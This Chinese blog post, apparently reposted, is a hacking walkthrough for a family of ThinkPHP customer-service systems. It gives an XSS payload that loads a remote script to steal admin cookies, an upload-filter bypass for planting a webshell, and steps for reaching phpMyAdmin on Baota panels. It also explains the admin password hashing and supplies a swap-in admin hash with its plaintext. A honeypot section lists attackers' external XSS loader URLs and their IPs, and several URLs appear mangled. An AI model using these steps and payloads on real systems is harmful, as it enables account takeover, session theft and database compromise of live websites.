文章更新于微信公眾號:蘇雅圖的雨
這套客服系統是基于ThinkPHP開發的,
并且經過了幾個版本的演變,
1.小馬PHP客服系統
這套系統應該是最早的,但是現在資產很少了,
2.迎客PHP客服系統
這個應該是某個小團隊改改著作權就用了的,
3.來客PHP客服系統
資產最多,成為主要攻擊目標,
4.好客PHP客服系統
......
其實這些客服系統都大同小異,
但是漏洞有一些區別,有的有,有的沒有,
原始碼獲取:關注公眾號發送“客服系統”,
漏洞位置:/admin/event/chat
漏洞危害:獲取在線客服權限
XSS_Payload:
<a href= https://www.cnblogs.com/arrdres/p/hidden>測驗<script src=//test.xss/xss1></script>
收到管理員Cookie
利用插件替換Cookie
訪問:/admin/index/chats.html
這個漏洞不是每套客服系統都有,有些會被過濾,有時候會過濾中文,可以經過編碼再發包,還有,有時候能打到管理系統的Cookie,可以直接獲得所有客服系統的管理權限,右上角位置回傳系統即可,
直接發送Payload是沒有效果的,需要改包發送,
漏洞位置:/admin/event/getwaitnum
漏洞危害:讀取資料庫內容
可以參考珂師傅的文章,這里不再細說,
傳送門:溫故而知新,老系統挖老漏洞
漏洞位置:/admin/event/uploadimg
校驗型別:黑名單驗證
繞過方法:shell.jpg.php
以下兩種情況說明不存在上傳漏洞,
還需要補充的是,當存在上傳漏洞時,
假如目標使用的是Apache服務,
那么訪問上傳后的WebShell是顯示403的,
雖說“中國人不騙中國人”,但是都知道我們與東南亞國家的語言并不相通,因此……
筆者同時在長達三個月的時間里部署了多個蜜罐,
捕獲到了多位黑客長期對該客服系統廣撒網式的攻擊樣本,而這多位黑客的攻擊手法卻大同小異,大同小異的同時又有著天壤之別,于是筆者猜測其中不乏有幾位腳本小子,為什么這么說?
你們是否聽過名醫扁鵲的一個小故事?
扁鵲年輕時游歷于魏國,行醫于魏文王王庭,
這個故事說明了什么道理?不言而喻,
同樣的,對于這套系統進行攻擊的多位黑客其實是實力懸殊的,因為倘若有四位黑客,其中只有一位黑客能夠利用漏洞獲取整個網站的控制權限,而其他三位黑客只能夠獲取普通的管理權限,也就是常說的一個能夠Getshell,另外一個只能打XSS,
即便能獲取整個網站的控制權限,再讀取資料庫的組態檔,但依然不能改變腳本小子的命運,因為首先他會接連的面臨三大問題:
1.如何成功連接到資料庫,
一般情況下,資料庫是無法外連的,
2.如何進入客服管理后臺,
管理員的MD5值無法解密,
3.如何修改加密的MD5值,
非簡單的MD5加密,
這三大問題又再次重現了“扁鵲的故事”,因為即便能夠成功連接資料庫,獲得資料庫權限,但是估計腳本小子們也無法使用賬號密碼名正言順的登錄管理后臺,原因是后臺的賬號密碼并非簡單的MD5加密,
在這里我均給出解決思路和方法,
首先這套系統多用寶塔進行搭建,因此存在888埠和8888埠,前者為PhpMyAdmin服務,后者為寶塔登錄面板,
我猜測,這時候腳本小子假如想通過PhpMyAdmin獲得資料庫權限,他又會連續遇到三個小問題,
1.直接訪問888埠顯示403,
需要PhpMyAdmin的完整路徑,
2.無法讀取到PhpMyAdmin的路徑,
不會繞過Open_basedir,
3.無法訪問到PhpMyAdmin,
這是一個迷惑的問題,
以Linux系統為例,
網站的路徑為/www/wwwroot/
PhpMyAdmin的路徑為/www/server/phpmyadmin/
無法訪問到PhpMyAdmin的原因:
沒有使用真實IP+888埠去訪問,
因此完整的訪問方法應該是:
http://IP:888/phpmyadmin_3959eb4ebfa493a9/
比較簡單的思路則是上傳一個adminer.php檔案,
按照上一步的思路登錄PhpMyAdmin后,存著管理員賬號和密碼的資料表是wolive_admin,而Password是無法解密的,這里給出第一個思路:本地搭建同樣的系統,替換Password值,
Username:admin
Password:c7122a1349c22cb3c009da3613d242ab
明文密碼:123456
注意,而這里給出替換Password的值僅適用于用戶名是admin的前提下,接下來我們還需要分析一下它是如何進行加密的,
代碼位置:/admin/controller/Login.php
框框位置簡單理解:用戶名+hjkj+密碼=MD5值
假設用戶名為admin,密碼為123456,
那MD5值應該是d8f7c2d2775869fb69b8757edcf6ae4f
經過測驗,實際上并非如此,
研究后得出加密方式:
$pass = md5(md5($adminPass) . $adminUser);
先將明文經過MD5第一遍加密,
再將第一次得到的MD5值加上用戶名做一次加密,
假設用戶名為test1,密碼為testpass,
1.加密明文:
2.第一次得到的MD5值為
179ad45c6ce2cb97cf1029e212046e81
再在MD5值的后面加上test1進行加密:
于是最終的Password值為
79c274670c1db637916f5f96b9be77e1
黑客使用的XSS_Payload:
<sCRiPt sRC=https://www.cnblogs.com//xss.yt/2kVZ></script>
<sCRiPt sRC=https://www.cnblogs.com//xss.yt/pQUp></script>
<sCRiPt sRC=https://www.cnblogs.com//xss.yt/ecAQ></script>
<sCRiPt sRC=https://www.cnblogs.com//xss.yt/eK73></script>
<sCRiPt sRC=https://www.cnblogs.com//xss.yt/o90g></script>
<sCRiPt sRC=https://www.cnblogs.com//xss.yt/ghsf></script>
<sCRiPt sRC=https://www.cnblogs.com////xss.yt/ZEbO></script>
<script src=https://www.cnblogs.com//cdn.jsdelivv.com/N></script>
<script src=https://www.cnblogs.com//jscdns.xss.ht></script>
<script src=https://www.cnblogs.com//chunkjscdn.xss.ht></script>
<sCRiPt/SrC=https://www.cnblogs.com//kk.jdss918.com/WQffoD>
<script src=https://www.cnblogs.com//xs.ax/KexI></script>
黑客使用的匿名IP:
45.76.188.135 新加坡
103.186.85.210 香港
27.0.232.185 香港
124.234.207.74 吉林 長春
119.5.224.133 四川 雅安
101.99.90.157 馬來西亞 吉隆坡
18.139.84.50 新加坡 亞馬遜云
38.45.125.42 香港 Cogent
202.182.104.253 日本 東京
159.138.136.214 香港 華為云
14.210.2.2 廣東 湛江
123.253.26.170 香港
152.32.226.56 香港 優刻云
152.32.240.127 香港 優刻云
152.32.240.153 香港 優刻云
152.32.189.234 香港 優刻云
103.149.27.156 香港 優刻云
8.210.52.141 香港 阿里云
118.193.40.28 香港 優刻云
118.193.34.44 香港 優刻云
118.193.40.66 香港 優刻云
118.193.35.125 香港 優刻云
23.248.163.140 香港 Zenlayer
207.46.13.50 美國 微軟云
91.245.253.48 羅馬尼亞
112.111.24.94 福建 聯通
198.13.39.74 日本 東京
123.253.26.170 香港
139.162.28.219 新加坡 Linode
129.150.52.158 美國 芝加哥
152.32.239.146 香港 優刻云
152.32.174.180 香港 優刻云
152.32.226.200 香港 優刻云
118.193.34.184 香港 優刻云
51.195.216.255 英國 倫敦
103.212.99.98 香港
103.14.33.97 香港 Zenlayer
128.199.20.138 美國 加利福尼亞
黑客使用Resty對蜜罐中不同的獨立客服進行遍歷,并發送大量惡意的XSS_Payload:
黑客多次針對蜜罐進行目錄掃描:
疑似黑客忘記使用匿名IP:
112.111.24.94 福建 聯通
多位黑客中有不少的來自Fofa搜索引擎的,這讓人值得深思,正如前文所說的,腳本小子有時候也很聰明,還知道有時候打XSS可能會遇到過濾中文的情況,于是都使用全英文去發送Payload,還能起到偽裝外國人的作用,不失為一個好辦法,
“出來混要有勢力,要有背景,你哪個道上的?”
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/536096.html
標籤:其他